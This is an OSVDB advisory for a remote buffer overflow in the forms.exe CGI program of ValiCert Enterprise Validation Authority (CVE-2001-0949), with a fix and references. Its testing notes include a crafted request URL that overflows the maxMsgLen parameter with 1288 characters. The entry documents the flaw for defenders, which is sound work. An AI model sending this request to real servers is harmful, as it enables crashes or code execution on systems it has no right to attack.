ValiCert Enterprise Validation Authority forms.exe maxMsgLen Overflow

2001-12-04T00:00:00
ID OSVDB:13222
Type osvdb
Reporter Phuzzy L0gic(phyz@nmrc.org), Cyberiad(cyberiad@nmrc.org)
Modified 2001-12-04T00:00:00

Description

Vulnerability Description

A remote overflow exists in Enterprise Validation Authority. The forms.exe program fails to validate the maxMsgLen variable resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

Solution Description

Upgrade to version 4.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

A remote overflow exists in Enterprise Validation Authority. The forms.exe program fails to validate the maxMsgLen variable resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

Manual Testing Notes

http://[victim]:13333/cgi-bin/forms.exe?serverHost=computer&port =80&listenLength=100&maxThread=16&maxConnPerSite=100&maxMsgLen ={A x 1288}&exitTime=-1&blockTime=5&nextUpdatePeriod=300&logFile =logs%2Fva&buildLocal=1&useSoftwareSigning=Software&sslSigningType =Software&sslServerHost=&sslCertFile=sslCert.cert&sslPrivateKey =ssl.privkey&useExpiredCRLs=0&maxOCSPValidityPeriod=0&command =Submit+Configuration+Parameters

References:

Security Tracker: 1002897 Related OSVDB ID: 13212 Related OSVDB ID: 13216 Related OSVDB ID: 13217 Related OSVDB ID: 13209 Related OSVDB ID: 13220 Related OSVDB ID: 13221 Related OSVDB ID: 13214 Related OSVDB ID: 13215 Related OSVDB ID: 13218 Related OSVDB ID: 13219 Related OSVDB ID: 13210 Related OSVDB ID: 13211 Related OSVDB ID: 13213 Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=100749428517090&w=2 ISS X-Force ID: 7652 CVE-2001-0949 Bugtraq ID: 3635